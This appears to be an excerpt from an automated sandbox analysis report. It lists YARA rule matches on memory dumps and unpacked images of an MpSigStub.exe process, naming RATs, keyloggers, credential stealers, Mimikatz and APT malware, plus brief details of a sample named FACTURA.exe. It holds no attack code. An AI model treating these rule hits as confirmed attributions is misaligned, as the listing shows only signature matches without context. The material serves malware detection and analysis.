Source: 36.3.MpSigStub.exe.197a36f3b2a.148.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a3279566.201.raw.unpack, type: UNPACKEDPE	Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 36.3.MpSigStub.exe.197a364b8a5.203.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 36.3.MpSigStub.exe.197a36f3b2a.205.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a4fa798e.184.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 36.3.MpSigStub.exe.197a364b8a5.181.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 36.3.MpSigStub.exe.197a4f46966.113.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 36.3.MpSigStub.exe.197a3929e2b.149.unpack, type: UNPACKEDPE	Matched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 36.3.MpSigStub.exe.197a39e033e.65.unpack, type: UNPACKEDPE	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 36.3.MpSigStub.exe.197a47aa096.53.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 36.3.MpSigStub.exe.197a47aa096.213.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 36.3.MpSigStub.exe.197a37e87d6.70.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a32ef4fa.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a364dcf9.202.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 36.3.MpSigStub.exe.197a4fa8d92.185.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 36.3.MpSigStub.exe.197a32a3acd.179.raw.unpack, type: UNPACKEDPE	Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a364dcf9.182.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 36.3.MpSigStub.exe.197a44b5166.45.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Derusbi Kernel Driver Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Pupy RAT Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a32ee0f6.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a3929e2b.210.unpack, type: UNPACKEDPE	Matched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 36.3.MpSigStub.exe.197a4c04b1a.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a36f3b2a.193.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a36f3b2a.193.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a36f3b2a.215.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a32a53a1.178.raw.unpack, type: UNPACKEDPE	Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a32eccf2.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a36f3b2a.148.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a3f84db6.63.unpack, type: UNPACKEDPE	Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 36.3.MpSigStub.exe.197a3f84db6.63.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE	Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE	Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4fa658a.183.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 36.3.MpSigStub.exe.197a4fa8d92.116.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 36.3.MpSigStub.exe.197a47aa096.59.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE	Matched rule: Detects export from Gold Dragon - February 2018 Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE	Matched rule: Detects Running RAT malware from Gold Dragon report Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE	Matched rule: Rescator PDB strings within binaries Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a4c03116.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a46f017a.58.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4f45162.112.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 36.3.MpSigStub.exe.197a33b6aa2.66.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from DrqgonFly APT report Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a36f3b2a.215.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack, type: UNPACKEDPE	Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 36.3.MpSigStub.exe.197a32a2a79.180.raw.unpack, type: UNPACKEDPE	Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE	Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE	Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE	Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE	Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE	Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 36.3.MpSigStub.exe.197a37e91da.72.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE	Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE	Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE	Matched rule: Detects credential stealer byed on many strings that indicate password store access Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE	Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 36.3.MpSigStub.exe.197a4fa658a.115.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 36.3.MpSigStub.exe.197a46f017a.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE	Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE	Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a434950c.82.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4fa798e.114.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 36.3.MpSigStub.exe.197a37e9bde.71.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a3e184e5.98.raw.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: 36.3.MpSigStub.exe.197a3f84db6.95.unpack, type: UNPACKEDPE	Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 36.3.MpSigStub.exe.197a3f84db6.95.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a3d9206c.229.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a357b147.154.unpack, type: UNPACKEDPE	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 36.3.MpSigStub.exe.197a357b147.154.unpack, type: UNPACKEDPE	Matched rule: This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell Author: FireEye
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE	Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE	Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE	Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 36.3.MpSigStub.exe.197a3f84db6.208.unpack, type: UNPACKEDPE	Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 36.3.MpSigStub.exe.197a3f84db6.208.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a3578ac5.153.unpack, type: UNPACKEDPE	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 36.3.MpSigStub.exe.197a3578ac5.153.unpack, type: UNPACKEDPE	Matched rule: This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell Author: FireEye
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE	Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE	Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE	Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE	Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: 9002 Identifying Strings Author: Seth Hardy
Source: 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 00000024.00000003.6341599132.00000197A3621000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000024.00000003.6355645936.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 00000024.00000003.6290353787.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ham_backdoor Author: Cylance Spear Team
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Keylogger component Author: Microsoft
Source: 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 00000024.00000003.6285143119.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: 00000024.00000003.6294532862.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000024.00000003.6356061064.00000197A47A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000024.00000003.6340905094.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp, type: MEMORY	Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects unspecified malware sample Author: Florian Roth
Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CVE_2018_4878_0day_ITW Author: unknown
Source: 00000024.00000003.6334441396.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000024.00000003.6316787263.00000197A40EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000024.00000003.6434024184.00000197A433E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects export from Gold Dragon - February 2018 Author: Florian Roth
Source: 00000024.00000003.6301296808.00000197A4FB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000024.00000003.6436059336.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 00000024.00000003.6288930033.00000197A47A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Detects Tofu Trojan Author: Cylance
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Keylogger - generic rule for a Chinese variant Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Detects specific RedLeaves and PlugX binaries Author: US-CERT Code Analysis Team
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Iron Panda Malware Htran Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: 9002 Identifying Strings Author: Seth Hardy
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: NetWiredRC Author: Jean-Philippe Teissier / @Jipe_
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR	Matched rule: CVE_2018_4878_0day_ITW Author: unknown

Source: C:\Users\user\Desktop\FACTURA.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 848

Source: FACTURA.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe.45.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCopyAccelerator.exe.45.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpDlpCmd.exe.45.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe0.45.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCopyAccelerator.exe0.45.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpAsDesc.dll.45.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
